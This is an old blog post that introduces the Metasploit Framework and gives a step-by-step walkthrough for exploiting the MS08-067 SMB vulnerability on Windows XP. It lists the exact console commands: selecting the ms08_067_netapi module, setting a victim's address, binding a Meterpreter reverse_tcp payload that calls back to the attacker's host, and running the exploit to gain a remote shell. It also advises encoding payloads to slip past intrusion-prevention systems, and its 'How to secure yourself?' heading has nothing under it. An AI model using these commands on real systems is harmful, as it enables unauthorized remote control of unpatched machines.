Tuesday 6 October 2015

On 23:18 by Himanshu Joshi in ,    No comments
MetaSploit Framwork : Hey Hackers! in this post of Learn Hacking we are going to tell you about the Metsploit Framework. This post is going to answer the following questions for you.

What is Metasploit

How to use the Metasploit Framework

hack-windows-xp-with-metasploit
What is Metasploit Project: The Metasploit Project is a computer security project which aims at providing information about security vulnerabilities and helps in penetration testing and Patching the exploits.
Metasploit framework is its famous sub project, a tool for developing and executing exploits against a remote machine. Apart from Metasploit Framework, Metasploit Project is well known for is anti-forensics and loopholes evading tools.
Other important sub-projects include the Opcode Database, shellcode archive, and security research.
About the Metasploit framework :
Metasploit Framework was programmed by HD Moore in 2003 as a network tool using PERL scripting language. It was reprogrammed using RUBY. You can develop and execute exploits against any target machine using this framework.
this framework comes with many inbuilt exploits and payloads.
Basic steps on How to use Metasploit Framework :
1. Searching and configuring an exploit : Searching exploit on the basis of data acquired by scanning and footprinting the target machine.(current version of Metasploit comes with around 800 exploits against different services.
2. Choosing and configuring a Payload : Payload is the code that will be executed upon the successfully entry into the target machine, for example, a remote shell.
3. Choosing the encoding technique to encode the payload so that the intrusion-prevention system (IPS) will not catch the encoded payload;
4. Executing the exploit.
The capability of combining any exploit with any framework is the best feature of Metasploit Framework.
Metasploit runs on all versions of unix and windows also. It includes two command line interface, a web browser based interface and a GUI.
Choosing exploit and payload is tricky work, you need to gather information about the target machine in order to make the eploit work. this information can be gathered using Port scanning and network scanning techniques Which will be covered in upcoming posts.
Where to get Metasploit Framework?
You can download the free version from the official Metasploit site-http://www.metasploit.com/download/
The free version also comes as a preinstalled application in all versions of Backtrack.
Have a look at the other Penetration tools by Metasploit Project :
http://www.metasploit.com/about/choose-right-edition/
Well Metasploit framwork might be a new tool to play with for some of you. Metasploit framework is pretty cool to play with and once you learn to use it the right way for Ethical Hacking, you are going to use this penetration testing tool often.
What does it exactly do?
How to secure yourself?
About Exploit :
The original name of exploit is Microsoft Server Service Relative Path Stack corruption. A remote user can send a specially crafter RPC request that triggers the overflow during path canonicalization and can execute arbitrary code on the target system.
CVE – ID : CVE-2008-4250
So lets Begin
1)      Install the latest version of Metasploit Framework on windows XP or on Backtrack.
2) Open Metasploit Console.
3) Type Show Exploits – This command will print the names and little description of all the exploits in your metasploit framework.
4) Then search for the exploit named ms08_067_netapi. The actual name differs in different version of metasploit, so u can also use search command to search this exploit.
Type Search smb exploit: this will print all SMB exploits, search for the one we want.
5) The type use windows/smb/ms08_067_netapi [USE pathoftheexploit |thiswindows/smb/ms08_067_netapi is the path of our exploit] in the console.
6) You can then type Show options, this will print all the options available for that exploit.
7) Now you need to configure your exploit to attack the target machine.
7.1) Type Set rhost victimipaddress [ Rhost refers to ip address of the victim, example :set rhost 192.168.1.22 . Here 192.168.1.22 is the address of the victim’s machine.]
7.2) Type set payload windows/meterpreter/reverse_tcp .This command will bind the payload reverse_tcp with our exploit. So what is a payload actually?
Let me clear your query!
Payload: Payload is the shellcode/assembly code/commands to be executed on the target machine once our exploit has gained access on the target machine.
Suppose your exploit is successfully executed on target machine, your payload will then tell it what to do after that!
reverse_tcp payload will open a reverse connection and will give you a metreprettersession and then you can do what ever you want.
You can also choose some different payload by typing show payloads, this command will print all the available payloads choose any and use the payload with command use payload payloadpath
7.3) set lhost yourownipaddress – Use this command to set local host address, the address on which the exploit will backconnect with. Set your own ip address here.
8) Now last step: type exploit and the exploit will execute and if the machine is not pathched, you will get a remote shell connection with the target machine and then you can then do whatever you want.
Note: You will get a remote connection in this case where payload selected is reverse_tcp. The result will vary according to the payload selected.

0 comments:

Post a Comment